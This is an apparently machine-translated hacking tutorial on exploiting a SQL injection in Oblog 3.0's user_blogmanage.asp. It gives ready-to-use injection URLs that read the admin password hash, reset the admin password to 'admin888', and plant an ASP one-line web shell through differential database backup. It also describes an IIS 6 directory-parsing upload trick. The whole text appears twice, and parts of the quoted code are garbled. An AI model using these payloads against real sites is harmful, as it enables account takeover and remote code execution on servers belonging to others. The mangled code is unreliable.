After watching the sixth round of Black Defense Laboratory's penetration process of the Oblog 3.0 Access version, the admiration is like the continuous river of water, and the water of the Yellow River is out of control. In particular, they have fully utilized the principles of social engineering and clever methods of uploading shells in the background. I admire it, admire it. After saying so much nonsense, we got to the point. When I was reading the Oblog3.0 code, I found that there was a security risk to the user_blogmanage.asp file. Let's take a look at the operation code for moving the blog log below:
sub moveblog()
if id="" then
("Please specify the log to be moved")
exit sub
end if
dim subjectid
subjectid=trim(request("subject"))
if subjectid="" then
("Please specify the topic to move")
exit sub
else
subjectid=Clng(subjectid)
end if
if instr(id,",")>0 then
‘If the id variable contains commas, remove the spaces in the variable and execute the following SQL statement. Set as the first item
id=replace(id," ","")
sql="Update [Oblog_log] set subject where logid in (" & id & ")"&wsql
‘Otherwise, execute this sql statement and set it to the second one.
else
sql="Update [Oblog_log] set subject where log"
set blog=nothing
set rs=("select subjectid from Oblog_subject where userselect count(logid) from Oblog_log where Oblog_log.subjectupdate Oblog_subject set subjectlognum="&rs1(0)&" where Oblog_subject.subject update theme subjectlognum="&rs1(0)&" where Oblog_subject.subject update theme subject.subject re-released theme to make the topic count accurate!",""
end sub
Let’s look at the filtering of the id variable at the top of the file: id=Oblog.filt_badstr(trim(Request("id"))), and only this statement is used, and the function code is as follows:
public function filt_badstr(str)
If Isnull(Str) Then
filt_badstr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"")
filt_badstr = Replace(Str,"'","''")
end function
Only \0 and single quotes were removed. Haha, how can this prevent our injection attack? Find a site that uses Oblog3.0 SQL version to try it out: Constructing environment test statement: /user_blogmanage.asp?action=Move&subject=1&id=@@version)--, be sure to pay attention to the "'" at the end of the statement, otherwise it will not succeed.
The above injection we selected is the first statement, which has more restrictions, that is, spaces cannot be used and the submitted statement must contain commas. We can use /**/ instead of spaces. Due to the many restrictions, in the following test, we control the program to execute the second statement. Further environmental spy:
/user_blogmanage.asp?action=Move&subject=1&id=1%20and%20db_name()>0--
/user_blogmanage.asp?action=Move&subject=1&id=1%20and%20db_user>0--。
Hehe, the test was successful. Since the injection statement cannot contain single quotes, we, who have experienced many battles, can easily avoid this limitation. I like to use the char function in SQL. I happen to have a char encoding tool for studying the char when writing when studying the Dianyi system. First, take a look at the table structure of the Oblog database. In the Oblog_admin table, we are interested in only the id, username and password fields. First, the password of the admin user or id's only administrator account will be exposed to see:
/user_blogmanage.asp?action=Move&subject=1&id=1 and 1=(select password from Oblog_admin where id=1)--or
/user_blogmanage.asp?action=Move&subject=1&id=1 and 1=(select password from Oblog_admin where username=char(0x61)%2Bchar(0x64)%2Bchar(0x6d)%2Bchar(0x69)%2Bchar(0x6e))--
where char(0x61)%2Bchar(0x64)%2Bchar(0x6d)%2Bchar(0x69)%2Bchar(0x6e) is the encoding of the submitted admin using the char function. Return the result.
Let's write down this encrypted string first, and use it again when restoring the administrator password. Modify the password of the background administrator:
/user_blogmanage.asp?action=Move&subject=1&id=1;update [Oblog_admin] set password= char(0x34)%2Bchar(0x36)%2Bchar(0x39)%2Bchar(0x65)%2Bchar(0x38)%2Bchar(0x30)%2Bchar(0x64)%2Bchar(0x33)%2Bchar(0x32)%2Bchar(0x63)%2Bchar(0x30)%2Bchar(0x35)%2Bchar(0x35)%2Bchar(0x39)%2Bchar(0x66)%2Bchar(0x38) where id=1--
Among them, char(0x34)%2Bchar(0x36)%2Bchar(0x39)%2Bchar(0x65)%2Bchar(0x38)%2Bchar(0x30)%2Bchar(0x64)%2Bchar(0x33)%2Bchar(0x32)%2Bchar(0x63)%2Bchar(0x30)%2Bchar(0x35)%2Bchar(0x39)%2Bchar(0x66)%2Bchar(0x38) is the encoding of the 469e80d32c0559f8 string. The md5 plaintext corresponding to 469e80d32c0559f8 is admin888. The following tools can be used for encoding the string.
Of course, everyone must have better tools. In this way, we will change the password of the administrator with id 1 to admin888. Note that the account corresponding to the administrator with id 1 is admin. If you are not sure, you can use the following statement to view:
/user_blogmanage.asp?action=Move&subject=1&id=1 and 1=(select username from Oblog_admin where id=1)—
After the modification is completed, log in to the background to see if the administrator password is successfully modified. good, we have obtained the background management permissions, which is great. Don't be too happy too early. Although we entered the background, the SQL version is different from the Access version. The method of obtaining WebShell by backing up the database introduced by the two heroes in the early stage does not work on the SQL version. Let's take a look at the following code of admin_database.asp and you will understand:
dim dbpath
dim ObjInstalled
if not IsObject(conn) then link_database
if is_sqldata=0 then dbpath=(db)
If you are using the Access version, the dbpath parameter will be initialized.
Here I will introduce to you several ways to obtain WebShell in SQL versions.
Let’s talk about the first more general method first. Using the characteristics of SQL SERVER, the methods include xp_cmdshell, OLE object interface, sp_makeWebtask, incremental backup, etc. A necessary condition for utilizing these methods: We can easily obtain the web physical path from the management homepage of the background. For specific injection statements, you can refer to the relevant codes in it. Pay attention to disposing of single quotes in the implementation. The program can automatically obtain cookie information in IE. Therefore, there is no need to fill in cookie information.
Regarding the use of background functions to upload shells, it really made me difficult for a long time, and I was thinking too much. At the beginning, the method was Angel Doll. Their idea was to add a shtm upload file type and include it. In this way, they could only see the database connection information. If the other party has a firewall or does not have high permissions, they could not get the shell. Later, they came up with adding aaspsp/ and asp/ upload file types. This prompted that the upload was successful by modifying the data packet, but it did not really upload successfully. It was very depressing. During the holidays, there was not much time to find the reason. At this time, I suddenly saw that the user directory could be set in the background. At this time, I suddenly remember that there was a feature of the web platform that was supposed to be circulated on the Internet for the Windows 2003 system and IIS 6.0, that is, any file with an extension under the **.asp virtual directory will be interpreted and executed as an asp file. I almost jumped up excitedly when I thought of this, hehe. Please see the operation: Create a new **.asp directory in the background general settings | User directory management. And set this directory to the default directory, as shown in the figure above. Then go to the website to register a new user, then enter the management center, select the album, and upload a fake gif file of the asp *. In this way, when we access this gif file, IIS will parse this file as an asp file. I tested it on the local machine using the Access version and found that the file can be uploaded. However, when testing the SQL version, it was found that the file cannot be uploaded correctly to this directory, and the following error message appears:
Error '800a0bbc'
Write to the file failed.
/inc/, line 312
Although it cannot be successful, this is a good way for us to upload *s in the background, because most of the Asp whole site programs allow the background to modify the upload directory, such as Dongyi system, etc. There is no way, we can only use the first method, start construction.
Step 1:
/user_blogmanage.asp?action=Move&subject=1&id=1;declare @a sysname;declare @s nvarchar(4000);select @a=db_name();select @s=0x77006F006B0061006F002E00620061006B00;backup database @a to disk=@s--
Note that the statement must not contain single quotes.
Step 2:
/user_blogmanage.asp?action=Move&subject=1&id=1;create table [dbo].[llikz] ([cmd] [image])—
Step 3:
/user_blogmanage.asp?action=Move&subject=1&id=1;insert into llikz(cmd) values(0x3C25657865637574652872657175657374282261222929253E)—
Note that 0x3C25657865637574652872657175657374282261222929253E is
Step 4:
/user_blogmanage.asp?action=Move&subject=1&id=1;declare
@a sysname;declare @s nvarchar(4000) select @a=db_name();select @s=0x66003a005c0062006c006f00670032003000300035005c0062006c006f006700730065
0072007600650072005c006c006c0069006b007a002e00610073007000;backup database
@a to disk=@s WITH DIFFERENTIAL—
Among them 0x66003a005c0062006c006f00670032003000300035005c0062006c006f006700730065007
2007600650072005c006c006c0069006b007a002e00610073007000 is the physical path of the web obtained in the background.
Using incremental backup only requires public permissions, which should be the best way to get WebShell for OBLOG 3.0 SQL version. If you feel that the operation is complicated, you don’t need to upload WebShell. Go to the background to modify your account to VIP user, or modify the upload space to 10000000KB, and treating the blog as a network USB flash drive is also good, haha. Because Oblog is popular on the Internet, the vulnerabilities are very harmful, so don’t mess around.
sub moveblog()
if id="" then
("Please specify the log to be moved")
exit sub
end if
dim subjectid
subjectid=trim(request("subject"))
if subjectid="" then
("Please specify the topic to move")
exit sub
else
subjectid=Clng(subjectid)
end if
if instr(id,",")>0 then
‘If the id variable contains commas, remove the spaces in the variable and execute the following SQL statement. Set as the first item
id=replace(id," ","")
sql="Update [Oblog_log] set subject where logid in (" & id & ")"&wsql
‘Otherwise, execute this sql statement and set it to the second one.
else
sql="Update [Oblog_log] set subject where log"
set blog=nothing
set rs=("select subjectid from Oblog_subject where userselect count(logid) from Oblog_log where Oblog_log.subjectupdate Oblog_subject set subjectlognum="&rs1(0)&" where Oblog_subject.subject update theme subjectlognum="&rs1(0)&" where Oblog_subject.subject update theme subject.subject re-released theme to make the topic count accurate!",""
end sub
Let’s look at the filtering of the id variable at the top of the file: id=Oblog.filt_badstr(trim(Request("id"))), and only this statement is used, and the function code is as follows:
public function filt_badstr(str)
If Isnull(Str) Then
filt_badstr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"")
filt_badstr = Replace(Str,"'","''")
end function
Only \0 and single quotes were removed. Haha, how can this prevent our injection attack? Find a site that uses Oblog3.0 SQL version to try it out: Constructing environment test statement: /user_blogmanage.asp?action=Move&subject=1&id=@@version)--, be sure to pay attention to the "'" at the end of the statement, otherwise it will not succeed.
The above injection we selected is the first statement, which has more restrictions, that is, spaces cannot be used and the submitted statement must contain commas. We can use /**/ instead of spaces. Due to the many restrictions, in the following test, we control the program to execute the second statement. Further environmental spy:
/user_blogmanage.asp?action=Move&subject=1&id=1%20and%20db_name()>0--
/user_blogmanage.asp?action=Move&subject=1&id=1%20and%20db_user>0--。
Hehe, the test was successful. Since the injection statement cannot contain single quotes, we, who have experienced many battles, can easily avoid this limitation. I like to use the char function in SQL. I happen to have a char encoding tool for studying the char when writing when studying the Dianyi system. First, take a look at the table structure of the Oblog database. In the Oblog_admin table, we are interested in only the id, username and password fields. First, the password of the admin user or id's only administrator account will be exposed to see:
/user_blogmanage.asp?action=Move&subject=1&id=1 and 1=(select password from Oblog_admin where id=1)--or
/user_blogmanage.asp?action=Move&subject=1&id=1 and 1=(select password from Oblog_admin where username=char(0x61)%2Bchar(0x64)%2Bchar(0x6d)%2Bchar(0x69)%2Bchar(0x6e))--
where char(0x61)%2Bchar(0x64)%2Bchar(0x6d)%2Bchar(0x69)%2Bchar(0x6e) is the encoding of the submitted admin using the char function. Return the result.
Let's write down this encrypted string first, and use it again when restoring the administrator password. Modify the password of the background administrator:
/user_blogmanage.asp?action=Move&subject=1&id=1;update [Oblog_admin] set password= char(0x34)%2Bchar(0x36)%2Bchar(0x39)%2Bchar(0x65)%2Bchar(0x38)%2Bchar(0x30)%2Bchar(0x64)%2Bchar(0x33)%2Bchar(0x32)%2Bchar(0x63)%2Bchar(0x30)%2Bchar(0x35)%2Bchar(0x35)%2Bchar(0x39)%2Bchar(0x66)%2Bchar(0x38) where id=1--
Among them, char(0x34)%2Bchar(0x36)%2Bchar(0x39)%2Bchar(0x65)%2Bchar(0x38)%2Bchar(0x30)%2Bchar(0x64)%2Bchar(0x33)%2Bchar(0x32)%2Bchar(0x63)%2Bchar(0x30)%2Bchar(0x35)%2Bchar(0x39)%2Bchar(0x66)%2Bchar(0x38) is the encoding of the 469e80d32c0559f8 string. The md5 plaintext corresponding to 469e80d32c0559f8 is admin888. The following tools can be used for encoding the string.
Of course, everyone must have better tools. In this way, we will change the password of the administrator with id 1 to admin888. Note that the account corresponding to the administrator with id 1 is admin. If you are not sure, you can use the following statement to view:
/user_blogmanage.asp?action=Move&subject=1&id=1 and 1=(select username from Oblog_admin where id=1)—
After the modification is completed, log in to the background to see if the administrator password is successfully modified. good, we have obtained the background management permissions, which is great. Don't be too happy too early. Although we entered the background, the SQL version is different from the Access version. The method of obtaining WebShell by backing up the database introduced by the two heroes in the early stage does not work on the SQL version. Let's take a look at the following code of admin_database.asp and you will understand:
dim dbpath
dim ObjInstalled
if not IsObject(conn) then link_database
if is_sqldata=0 then dbpath=(db)
If you are using the Access version, the dbpath parameter will be initialized.
Here I will introduce to you several ways to obtain WebShell in SQL versions.
Let’s talk about the first more general method first. Using the characteristics of SQL SERVER, the methods include xp_cmdshell, OLE object interface, sp_makeWebtask, incremental backup, etc. A necessary condition for utilizing these methods: We can easily obtain the web physical path from the management homepage of the background. For specific injection statements, you can refer to the relevant codes in it. Pay attention to disposing of single quotes in the implementation. The program can automatically obtain cookie information in IE. Therefore, there is no need to fill in cookie information.
Regarding the use of background functions to upload shells, it really made me difficult for a long time, and I was thinking too much. At the beginning, the method was Angel Doll. Their idea was to add a shtm upload file type and include it. In this way, they could only see the database connection information. If the other party has a firewall or does not have high permissions, they could not get the shell. Later, they came up with adding aaspsp/ and asp/ upload file types. This prompted that the upload was successful by modifying the data packet, but it did not really upload successfully. It was very depressing. During the holidays, there was not much time to find the reason. At this time, I suddenly saw that the user directory could be set in the background. At this time, I suddenly remember that there was a feature of the web platform that was supposed to be circulated on the Internet for the Windows 2003 system and IIS 6.0, that is, any file with an extension under the **.asp virtual directory will be interpreted and executed as an asp file. I almost jumped up excitedly when I thought of this, hehe. Please see the operation: Create a new **.asp directory in the background general settings | User directory management. And set this directory to the default directory, as shown in the figure above. Then go to the website to register a new user, then enter the management center, select the album, and upload a fake gif file of the asp *. In this way, when we access this gif file, IIS will parse this file as an asp file. I tested it on the local machine using the Access version and found that the file can be uploaded. However, when testing the SQL version, it was found that the file cannot be uploaded correctly to this directory, and the following error message appears:
Error '800a0bbc'
Write to the file failed.
/inc/, line 312
Although it cannot be successful, this is a good way for us to upload *s in the background, because most of the Asp whole site programs allow the background to modify the upload directory, such as Dongyi system, etc. There is no way, we can only use the first method, start construction.
Step 1:
/user_blogmanage.asp?action=Move&subject=1&id=1;declare @a sysname;declare @s nvarchar(4000);select @a=db_name();select @s=0x77006F006B0061006F002E00620061006B00;backup database @a to disk=@s--
Note that the statement must not contain single quotes.
Step 2:
/user_blogmanage.asp?action=Move&subject=1&id=1;create table [dbo].[llikz] ([cmd] [image])—
Step 3:
/user_blogmanage.asp?action=Move&subject=1&id=1;insert into llikz(cmd) values(0x3C25657865637574652872657175657374282261222929253E)—
Note that 0x3C25657865637574652872657175657374282261222929253E is
Step 4:
/user_blogmanage.asp?action=Move&subject=1&id=1;declare
@a sysname;declare @s nvarchar(4000) select @a=db_name();select @s=0x66003a005c0062006c006f00670032003000300035005c0062006c006f006700730065
0072007600650072005c006c006c0069006b007a002e00610073007000;backup database
@a to disk=@s WITH DIFFERENTIAL—
Among them 0x66003a005c0062006c006f00670032003000300035005c0062006c006f006700730065007
2007600650072005c006c006c0069006b007a002e00610073007000 is the physical path of the web obtained in the background.
Using incremental backup only requires public permissions, which should be the best way to get WebShell for OBLOG 3.0 SQL version. If you feel that the operation is complicated, you don’t need to upload WebShell. Go to the background to modify your account to VIP user, or modify the upload space to 10000000KB, and treating the blog as a network USB flash drive is also good, haha. Because Oblog is popular on the Internet, the vulnerabilities are very harmful, so don’t mess around.